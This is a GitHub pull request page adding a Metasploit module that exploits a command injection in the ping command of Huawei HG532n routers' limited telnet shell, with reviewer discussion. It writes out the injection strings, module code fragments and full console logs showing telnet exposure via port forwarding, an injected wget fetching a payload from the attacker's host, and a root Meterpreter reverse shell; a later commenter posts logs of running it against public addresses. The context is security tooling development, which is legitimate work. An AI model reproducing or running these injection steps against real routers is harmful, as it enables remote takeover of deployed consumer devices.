New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Huawei HG532n command injection exploit #8245

Merged
merged 5 commits into from Apr 17, 2017

Conversation

Projects
None yet
7 participants
@a-darwish
Contributor

a-darwish commented Apr 15, 2017

The Huawei HG532n routers, shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface, leading to a root shell.

TE-Data, the incumbent ISP operator in Egypt, provided this router to customers by default. A 3-day finger-printing network scan shows around 50,000+ device exploitable in the wild.

Affected hardware/software version strings:

  Manufacturer: Huawei Technologies Co., Ltd.
  Product Style: HG532n
  SN: B7J7SB9381703791
  IP: 192.168.1.1
  Hardware Version: HG532EAM1HG530ERRAMVER.B
  Software Version: V100R001C105B016 TEDATA

The web interface has two kinds of logins, a limited user:user login given to all customers, and an admin mode used by company's technical staff. For machines within the TE-Data network, this web interface is remotely accessible.

The web interface's user mode provides very limited functionality, only WIFI passwords change and NAT port-forwarding. Nonetheless by port forwarding the router's own (filtered) telnet port, it becomes remotely accessible.

Due to the ISP's (encrypted) runtime router configuration at /etc/defaultcfg.xml though, the telnet daemon does not provide a direct linux shell. Rather a very limited custom shell is provided instead, called the "ATP command line tool". Upon disassembling this user-facing binary, it's discovered that the limited shell has a hidden ping command which falls back to the system own shell (ping %s > /var/res_ping). We exploit that through command injection to gain Meterpreter root access:

[darwish@Home-PC]$ telnet 41.36.32.88 35000 
Trying 41.36.32.88...
Connected to 41.36.32.88.
Escape character is '^]'.
HG520b> help
Welcome to ATP command line tool.
If any question, please input "?" at the end of command.

HG520b>?
cls 
debug 
ip 
sys 
lan 
help 
save 
? 
exit 

HG520b> debug display cwmp
...
CPE OUI:00E0FC
CPE ProductClass:HG532n
CPE SerialNumber:B7J7SB9390600466
CPE Manufacture:Huawei Technologies Co., Ltd.
CPE ModelName:HG532n

HG520b> ping ?;cat${IFS}/proc/cpuinfo;true
ping: bad address '?'
system type		: Ralink RT63365 SOC
processor		: 0
cpu model		: MIPS 34K V5.5
BogoMIPS		: 332.59
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 32
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
VCED exceptions		: not available
VCEI exceptions		: not available
Success
ping result:

Verification

Since this is specific to a certain hardware device, please find below PCAP captures (and msfconsole log) for two remotely attacked routers -- on different Internet subnets.

huawei-hg532n-pcap-capture.zip

Also kindly check below a screenshot of the exploit + an example run when VERBOSE is set to true:

router1-exploit

$ msfconsole
msf > use exploit/linux/http/huawei_hg532n_cmdinject

msf exploit(huawei_hg532n_cmdinject) > set RHOST 197.38.98.11
RHOST => 197.38.98.11

msf exploit(huawei_hg532n_cmdinject) > set SRVHOST 41.34.32.121
SRVHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set LHOST 41.34.32.121
LHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set VERBOSE true
VERBOSE => true

msf exploit(huawei_hg532n_cmdinject) > exploit
[*] Exploit running as background job.
msf exploit(huawei_hg532n_cmdinject) >
[-] Handler failed to bind to 41.34.32.121:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Validating router's HTTP server (197.38.98.11:80) signature
[+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposted telnet port = 33552
[*] Connecting to just-exposed telnet port 33552
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '������
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hostinig /MDGuEPiUDBRXD
[*] Using URL: http://0.0.0.0:8080/MDGuEPiUDBRXD
[*] Local IP: http://192.168.1.3:8080/MDGuEPiUDBRXD
[*] Runninig command on target: wget -g -v -l /tmp/zjtmztfz -r /MDGuEPiUDBRXD -P8080 41.34.32.121
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/zjtmztfz${IFS}-r${IFS}/MDGuEPiUDBRXD${IFS}-P8080${IFS}41.34.32.121;true'
[*] Received new reply token = 'ping: bad address '?''
[+] HTTP server received request. Sending payload to victim
[*] Received new reply token = 'The IP is [41.34.32.121]'
[*] Received new reply token = 'Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: chmod 777 /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}777${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;/tmp/zjtmztfz&trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: rm /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;rm${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Waiting for the payload to connect back ..
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 197.38.98.11:50097) at 2017-04-15 16:45:05 +0200
[+] Payload connected!
[*] Server stopped.

msf exploit(huawei_hg532n_cmdinject) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.21.5)
Architecture : mips
Meterpreter  : mipsbe/linux
meterpreter >

Style

  • rubocop clean. This is true except for the comment: Assignment Branch Condition size for <method> is too high.; the mentioned methods cannot be made any shorter.
  • msftidy clean.
  • Documentation attached in pull request documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
# the router's busybox echo does not understand the necessary
# "-en" options. It outputs them to the binary instead.
#
# We could not also use the `wget' command stager, as Huawei

This comment has been minimized.

@h00die

h00die Apr 15, 2017

Contributor

This is priceless, and should also (and possibly is) captured in the docs. First suggestion was going to be to use wget stager, but you already captured why it wouldn't work. Very nice!

@h00die

h00die Apr 15, 2017

Contributor

This is priceless, and should also (and possibly is) captured in the docs. First suggestion was going to be to use wget stager, but you already captured why it wouldn't work. Very nice!

This comment has been minimized.

@a-darwish

a-darwish Apr 16, 2017

Contributor

@h00die Thanks a lot 😊😊

What would you suggest as a good place for documenting this; the module's own markdown docs? There are other Huawei-specific options beside the ones used above, so yes it's worth documenting indeed.

P.S. If this is to be merged, in another PR I can modify the wget stager to have a new opts[:huawei] option that produces the huawei-specfic wget parameters. Then in that same new PR we can modify this module to use the new wget stager ;-)

@a-darwish

a-darwish Apr 16, 2017

Contributor

@h00die Thanks a lot 😊😊

What would you suggest as a good place for documenting this; the module's own markdown docs? There are other Huawei-specific options beside the ones used above, so yes it's worth documenting indeed.

P.S. If this is to be merged, in another PR I can modify the wget stager to have a new opts[:huawei] option that produces the huawei-specfic wget parameters. Then in that same new PR we can modify this module to use the new wget stager ;-)

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

I think it's fine to save it for next time.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

I think it's fine to save it for next time.

This comment has been minimized.

@h00die

h00die Apr 17, 2017

Contributor

I would make a section in this module's markdown docs called notes (prob the 2nd section, after vulnerable app but before commands to use the module). That will shorten the module and make it easy to see. You could then change the in module comments to say something like " see notes in docs for additional details" so it's obvious there's info elsewhere to check.

Also up for suggestions or any other ideas.
Every comment shouldn't be converted to the markdown docs but some of the longer more explanatory ones would be better there.

@h00die

h00die Apr 17, 2017

Contributor

I would make a section in this module's markdown docs called notes (prob the 2nd section, after vulnerable app but before commands to use the module). That will shorten the module and make it easy to see. You could then change the in module comments to say something like " see notes in docs for additional details" so it's obvious there's info elsewhere to check.

Also up for suggestions or any other ideas.
Every comment shouldn't be converted to the markdown docs but some of the longer more explanatory ones would be better there.

This comment has been minimized.

@a-darwish

a-darwish Apr 17, 2017

Contributor

@h00die Done. Module info hash and other comments properly abridged. Documentation file expanded (wget details, mips toolchain builds, etc.)

@a-darwish

a-darwish Apr 17, 2017

Contributor

@h00die Done. Module info hash and other comments properly abridged. Documentation file expanded (wget details, mips toolchain builds, etc.)

@wwebb-r7

This comment has been minimized.

Show comment
Hide comment
@wwebb-r7

wwebb-r7 Apr 15, 2017

Contributor

I'd suggest maybe moving most of the stuff in the info hash to the docs. Keep it somewhat along the lines of:

This module exploits an ABC vulnerability present in XYZ widgets version 123. Exploitation of this vulnerability results in remote something something in the security context of whatever-user. Other brief explanations of stuff that you feel are necessary are ok to put here as well.

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

Contributor

wwebb-r7 commented Apr 15, 2017

I'd suggest maybe moving most of the stuff in the info hash to the docs. Keep it somewhat along the lines of:

This module exploits an ABC vulnerability present in XYZ widgets version 123. Exploitation of this vulnerability results in remote something something in the security context of whatever-user. Other brief explanations of stuff that you feel are necessary are ok to put here as well.

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

@a-darwish

This comment has been minimized.

Show comment
Hide comment
@a-darwish

a-darwish Apr 16, 2017

Contributor

@wwebb-r7:

I'd suggest maybe moving most of the stuff in the info hash to the docs ...

Sure, will update the PR now. (Edit: done)

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

Yeah, /dev/mtdblock[0123] are easily extract-able from all attacked devices. Using binwalk on mtdblock3 contents also produces a direct squashfs root image. I can send any of those upon request 😃

Contributor

a-darwish commented Apr 16, 2017

@wwebb-r7:

I'd suggest maybe moving most of the stuff in the info hash to the docs ...

Sure, will update the PR now. (Edit: done)

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

Yeah, /dev/mtdblock[0123] are easily extract-able from all attacked devices. Using binwalk on mtdblock3 contents also produces a direct squashfs root image. I can send any of those upon request 😃

@wwebb-r7

This comment has been minimized.

Show comment
Hide comment
@wwebb-r7

wwebb-r7 Apr 16, 2017

Contributor

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

Contributor

wwebb-r7 commented Apr 16, 2017

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

@a-darwish

This comment has been minimized.

Show comment
Hide comment
@a-darwish

a-darwish Apr 16, 2017

Contributor

@wwebb-r7 commented on Apr 16, 2017, 11:50 AM GMT+3:

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

Ok. I'm preparing a VM now for the r7 team to login into. Hosts outside the ISP network will not be able to access the target routers' port 80, so this will be a VM from within where things should work.

Contributor

a-darwish commented Apr 16, 2017

@wwebb-r7 commented on Apr 16, 2017, 11:50 AM GMT+3:

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

Ok. I'm preparing a VM now for the r7 team to login into. Hosts outside the ISP network will not be able to access the target routers' port 80, so this will be a VM from within where things should work.

@busterb busterb self-assigned this Apr 17, 2017

Show outdated Hide outdated modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
# IO redirection.
#
def execute_command(command, error_regex = nil, background: false)
print_status "Runninig command on target: #{command}"

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

This looks like a typo.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

This looks like a typo.

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Apr 17, 2017

Contributor

Looks good to me, nice work. We can help make sure that the operator gets the note too.

Contributor

busterb commented Apr 17, 2017

Looks good to me, nice work. We can help make sure that the operator gets the note too.

Show outdated Hide outdated modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
end
if res.body.include? valid_port_export_marker
print_good "Telnet port forwarding succeeded; exposted telnet port = #{external_telnet_port}"

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

Exposed?

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

Exposed?

Show outdated Hide outdated modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
@telnet_sock.write(atp_cmd + OPT_NAOFFD + OPT_BINARY)
telnet_prompt_wait(error_regex)
print_good "Command executed succesfully"

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

Successfully?

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

Successfully?

Show outdated Hide outdated modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
if datastore['DOWNHOST']
print_status "Will not start local web server, as DOWNHOST is already defined"
else
print_status("Starting web server; hostinig #{resource_uri}")

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

Hosting?

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

Hosting?

Show outdated Hide outdated modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
wget_cmd = "wget -g -v -l #{output_file} -r #{payload_uri} -P#{srv_port} #{srv_host}"
execute_command(wget_cmd, [/cannot connect/, /\d+ error/]) # `404 error', etc.
execute_command("chmod 777 #{output_file}", /No such file/)

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

700 should be fine, no?

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

700 should be fine, no?

This comment has been minimized.

@busterb

busterb Apr 17, 2017

Contributor

yeah I presume it should

@busterb

busterb Apr 17, 2017

Contributor

yeah I presume it should

a-darwish added some commits Apr 17, 2017

huawei_hg532n_cmdinject: Use minimum permissions for staged binary
Use u+rwx permissions only, instead of full 777, while staging the
wget binary to target. As suggested by @wvu-r7 and @busterb.
Show outdated Hide outdated modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
external_telnet_port = rand(32767) + 32768
portmapping_page = '/html/application/portmapping.asp'
url_append = "?x=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.PortMapping&RequestFile=#{portmapping_page}"

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

vars_get?

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

vars_get?

Show outdated Hide outdated modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
res = send_request_cgi(
'method' => 'POST',
'uri' => "/html/application/del.cgi?RequestFile=#{portmapping_page}",

This comment has been minimized.

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

vars_get?

@wvu-r7

wvu-r7 Apr 17, 2017

Contributor

vars_get?

a-darwish added some commits Apr 17, 2017

huawei_hg532n_cmdinject: Improve overall documentation
- Add section on compiling custom binaries for the device
- Add documentation for Huawei's wget flavor (thanks @h00die)
- Abridge the module's info hash contents (thanks @wwebb-r7)
- Abridge the module's comments; reference documentation (@h00die)
huawei_hg532n_cmdinject: Use send_request_cgi() 'vars_get' key
Instead of rolling our own GET parameters implementation.

Thanks @wvu-r7!

@busterb busterb merged commit e21504b into rapid7:master Apr 17, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb pushed a commit that referenced this pull request Apr 17, 2017

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Apr 17, 2017

Contributor

Release Notes

The exploits/linux/http/huawei_hg532n_cmdinject module has been added to the framework. It exploits Huawei HG532n routers, which as shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface.

Contributor

busterb commented Apr 17, 2017

Release Notes

The exploits/linux/http/huawei_hg532n_cmdinject module has been added to the framework. It exploits Huawei HG532n routers, which as shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface.

@busterb busterb added the rn-exploit label Apr 17, 2017

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Apr 17, 2017

Contributor

Thanks @a-darwish , great module and contribution.

Contributor

busterb commented Apr 17, 2017

Thanks @a-darwish , great module and contribution.

@todb-r7 todb-r7 referenced this pull request Apr 18, 2017

Merged

Add a reference to the original PR #8262

3 of 3 tasks complete
@Boushy

This comment has been minimized.

Show comment
Hide comment
@Boushy

Boushy Apr 26, 2017

[-] Exploit failed: NoMethodError undefined method `match?' for #String:0x00000003bc3600
always happen
screenshot - 04262017 - 06 17 01 pm

Boushy commented Apr 26, 2017

[-] Exploit failed: NoMethodError undefined method `match?' for #String:0x00000003bc3600
always happen
screenshot - 04262017 - 06 17 01 pm

@a-darwish

This comment has been minimized.

Show comment
Hide comment
@a-darwish

a-darwish Apr 27, 2017

Contributor

@Boushy Update your environment to the required ruby-2.4 version where the String.match? method is defined. A simple $ bundle install should automatically do that since this is explicitly stated in the repository's .ruby-version file.

P.S. Merged pull requests are not a place for asking for help. Discuss over IRC or open an explicit Github issue ticket for that.

Contributor

a-darwish commented Apr 27, 2017

@Boushy Update your environment to the required ruby-2.4 version where the String.match? method is defined. A simple $ bundle install should automatically do that since this is explicitly stated in the repository's .ruby-version file.

P.S. Merged pull requests are not a place for asking for help. Discuss over IRC or open an explicit Github issue ticket for that.

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Apr 27, 2017

Contributor

Great response, @a-darwish!!

Contributor

wvu-r7 commented Apr 27, 2017

Great response, @a-darwish!!

@abkrenoo

This comment has been minimized.

Show comment
Hide comment
@abkrenoo

abkrenoo Nov 18, 2017

I get this please help


[-] Handler failed to bind to 156.202.xxx.xxx:443:- -
[] Started reverse TCP handler on 0.0.0.0:443
[
] Validating router's HTTP server (156.203.xxx.xxx:80) signature
msf exploit(41895) > [+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposed telnet port = 34401
[] Connecting to just-exposed telnet port 34401
[+] Connection succeeded. Passing telnet credentials
[
] Received new reply token = '������
Password:'
[] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[
] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[] Starting web server; hosting /EGcNepbLKnzPx
[
] Using URL: http://0.0.0.0:8080/EGcNepbLKnzPx
[] Local IP: http://192.168.1.108:8080/EGcNepbLKnzPx
[
] Running command on target: wget -g -v -l /tmp/sshrqizh -r /EGcNepbLKnzPx -P8080 156.202.xx.xx
[] Received new reply token = 'p'
[
] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/sshrqizh${IFS}-r${IFS}/EGcNepbLKnzPx${IFS}-P8080${IFS}156.202.xxx.xx;true'
[] Received new reply token = 'ping: bad address '?''
[
] Received new reply token = 'The IP is [156.202.xx.xxx]'
[*] Received new reply token = 'wget: Transfer timeout!

Success
ping result:
HG520b>'
[+] Command executed successfully
[] Running command on target: chmod 700 /tmp/sshrqizh
[
] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}700${IFS}/tmp/sshrqizh;trueping: bad address '?'
chmod: /tmp/sshrqizh: No such file or directory

Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.

abkrenoo commented Nov 18, 2017

I get this please help


[-] Handler failed to bind to 156.202.xxx.xxx:443:- -
[] Started reverse TCP handler on 0.0.0.0:443
[
] Validating router's HTTP server (156.203.xxx.xxx:80) signature
msf exploit(41895) > [+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposed telnet port = 34401
[] Connecting to just-exposed telnet port 34401
[+] Connection succeeded. Passing telnet credentials
[
] Received new reply token = '������
Password:'
[] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[
] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[] Starting web server; hosting /EGcNepbLKnzPx
[
] Using URL: http://0.0.0.0:8080/EGcNepbLKnzPx
[] Local IP: http://192.168.1.108:8080/EGcNepbLKnzPx
[
] Running command on target: wget -g -v -l /tmp/sshrqizh -r /EGcNepbLKnzPx -P8080 156.202.xx.xx
[] Received new reply token = 'p'
[
] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/sshrqizh${IFS}-r${IFS}/EGcNepbLKnzPx${IFS}-P8080${IFS}156.202.xxx.xx;true'
[] Received new reply token = 'ping: bad address '?''
[
] Received new reply token = 'The IP is [156.202.xx.xxx]'
[*] Received new reply token = 'wget: Transfer timeout!

Success
ping result:
HG520b>'
[+] Command executed successfully
[] Running command on target: chmod 700 /tmp/sshrqizh
[
] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}700${IFS}/tmp/sshrqizh;trueping: bad address '?'
chmod: /tmp/sshrqizh: No such file or directory

Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Nov 18, 2017

Contributor

I'm going to take a stab in the dark since you've given us little to go by (like info on the target since you are authorized to test it and all), and haven't show us the options...
First line, can't bind to interface.
However this is a PR, not an issue. If it's a bug post an issue, not here. If you need help learning msf use IRC where people can assist.
Do not reply here.

Contributor

h00die commented Nov 18, 2017

I'm going to take a stab in the dark since you've given us little to go by (like info on the target since you are authorized to test it and all), and haven't show us the options...
First line, can't bind to interface.
However this is a PR, not an issue. If it's a bug post an issue, not here. If you need help learning msf use IRC where people can assist.
Do not reply here.

@abkrenoo

This comment has been minimized.

Show comment
Hide comment
@abkrenoo

abkrenoo Nov 18, 2017

I’m sorry I should have been more clear. the issue is in thsese last few lines
——
Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.
———
the router is HG532n

options :
Name Current Setting Required Description


DOWNFILE no Filename to download, (default: random)
DOWNHOST no Alternative host to request the MIPS payload from
HttpPassword user no Web-interface username password
HttpUsername user no Valid web-interface user-mode username
ListenerTimeout 60 yes Number of seconds to wait for the exploit to connect back
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 156.203.5.yy yes The target address
RPORT 80 yes The target port (TCP)
SRVHOST 156.202.32.xx yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TelnetPassword admin no Telnet username password
TelnetUsername admin no Valid router telnet username
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload options (linux/mipsbe/meterpreter_reverse_tcp):

Name Current Setting Required Description


LHOST 156.202.32.xx yes The listen address
LPORT 443 yes The listen port

Exploit target:

Id Name


0 Linux mipsbe Payload

abkrenoo commented Nov 18, 2017

I’m sorry I should have been more clear. the issue is in thsese last few lines
——
Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.
———
the router is HG532n

options :
Name Current Setting Required Description


DOWNFILE no Filename to download, (default: random)
DOWNHOST no Alternative host to request the MIPS payload from
HttpPassword user no Web-interface username password
HttpUsername user no Valid web-interface user-mode username
ListenerTimeout 60 yes Number of seconds to wait for the exploit to connect back
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 156.203.5.yy yes The target address
RPORT 80 yes The target port (TCP)
SRVHOST 156.202.32.xx yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TelnetPassword admin no Telnet username password
TelnetUsername admin no Valid router telnet username
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload options (linux/mipsbe/meterpreter_reverse_tcp):

Name Current Setting Required Description


LHOST 156.202.32.xx yes The listen address
LPORT 443 yes The listen port

Exploit target:

Id Name


0 Linux mipsbe Payload

@rapid7 rapid7 locked and limited conversation to collaborators Nov 18, 2017

@wwebb-r7

This comment has been minimized.

Show comment
Hide comment
@wwebb-r7

wwebb-r7 Nov 18, 2017

Contributor

As mentioned by @h00die , this is not the place for module support. File an issue or see the IRC channel.

Contributor

wwebb-r7 commented Nov 18, 2017

As mentioned by @h00die , this is not the place for module support. File an issue or see the IRC channel.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.